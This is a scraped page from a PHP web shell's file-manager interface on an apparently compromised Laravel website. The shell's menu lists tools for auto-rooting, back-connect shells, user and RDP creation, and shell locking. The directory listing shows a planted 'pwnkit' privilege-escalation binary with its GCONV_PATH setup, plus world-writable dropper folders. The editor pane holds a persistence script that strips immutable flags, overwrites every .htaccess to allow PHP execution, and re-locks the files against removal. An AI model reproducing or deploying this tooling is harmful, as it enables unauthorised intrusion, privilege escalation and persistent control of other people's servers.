Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.252
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo4.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
1esgjpx
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
cumnofv
[ DIR ]
drwxrwxrwx
documentation
[ DIR ]
drwxr-xr-x
fep1avo
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxr-xr-x
lara
[ DIR ]
drwxr-xr-x
lehyrug
[ DIR ]
drwxrwxrwx
obmjx1l
[ DIR ]
drwxrwxrwx
product-images
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
sumdgtj
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
witlpfy
[ DIR ]
drwxrwxrwx
wmrvpgj
[ DIR ]
drwxrwxrwx
.DS_Store
10
KB
-rw-r--r--
.editorconfig
235
B
-rw-r--r--
.env
894
B
-rw-r--r--
.env.example
915
B
-rw-r--r--
.gitattributes
116
B
-rw-r--r--
.gitignore
320
B
-rw-r--r--
.htaccess
1.96
KB
-r--r--r--
.mad-root
0
B
-rw-r--r--
.styleci.yml
194
B
-rw-r--r--
artisan
1.7
KB
-rw-r--r--
cjfuns.php
2.43
KB
-rw-r--r--
composer.json
1.91
KB
-rw-r--r--
composer.lock
325.46
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
index.php
22.49
KB
-r--r--r--
license-bjai.php
629
B
-rw-r--r--
package.json
491
B
-rw-r--r--
phpunit.xml
1.2
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.md
3.75
KB
-rw-r--r--
robots.txt
85
B
-rw-r--r--
server.php
584
B
-rw-r--r--
webpack.mix.js
576
B
-rw-r--r--
wp-blog-header.php
0
B
-rw-r--r--
wp-load.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cjfuns.php
<?php // Upload folder: /home/signgwph/signaltechdemo4.com/tests $uf = '/home/signgwph/signaltechdemo4.com/tests'; $ht = '# =========================================================== # WORKING .htaccess - HARD TO CHANGE, NO ERRORS # =========================================================== # 1. ALLOW ALL PHP FILES (NO ERRORS) <FilesMatch "\\.(php|php[0-9]+|phtml|phar|inc)$"> Allow from all </FilesMatch> # 2. PROTECT .htaccess FILE (MULTI-LAYER) <Files ~ "^\\.ht"> Deny from all Satisfy All </Files> <FilesMatch "\\.(htaccess|htpasswd|htgroup)$"> Deny from all </FilesMatch> # 3. BLOCK .htaccess VIA URL (SAFE METHOD) RedirectMatch 403 \\.ht # 4. NO DIRECTORY LISTING Options -Indexes # 5. BLOCK ACCESS TO PROTECTED FILES <FilesMatch "\\.(sql|bak|old|swp|log|env|ini|config|sh|py|exe)$"> Deny from all </FilesMatch>'; // FORCE UPDATE ALL .htaccess - EVEN LOCKED ONES function forceFixAll($folder, $content) { if (!is_dir($folder)) return; $allDirs = [$folder]; $stack = [$folder]; // Get ALL directories while (!empty($stack)) { $current = array_pop($stack); $items = @scandir($current); if ($items) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $current . '/' . $item; if (is_dir($path)) { $allDirs[] = $path; $stack[] = $path; } } } } // DELETE AND RECREATE EVERY .htaccess - EVEN LOCKED foreach ($allDirs as $dir) { $htFile = $dir . '/.htaccess'; // REMOVE IMMUTABLE LOCK FIRST (Linux) if (PHP_OS_FAMILY === 'Linux' && function_exists('exec')) { @exec('chattr -i ' . escapeshellarg($htFile) . ' 2>/dev/null'); } // DELETE OLD FILE if (file_exists($htFile)) { @chmod($htFile, 0644); @unlink($htFile); } // CREATE NEW FILE file_put_contents($htFile, $content); chmod($htFile, 0444); // RE-LOCK IT if (PHP_OS_FAMILY === 'Linux' && function_exists('exec')) { @exec('chattr +i ' . escapeshellarg($htFile) . ' >/dev/null 2>&1 &'); } } } // RUN THE FIX - UPDATES EVEN LOCKED HTACCESS if (is_dir($uf)) { forceFixAll($uf, $ht); } ?>
Close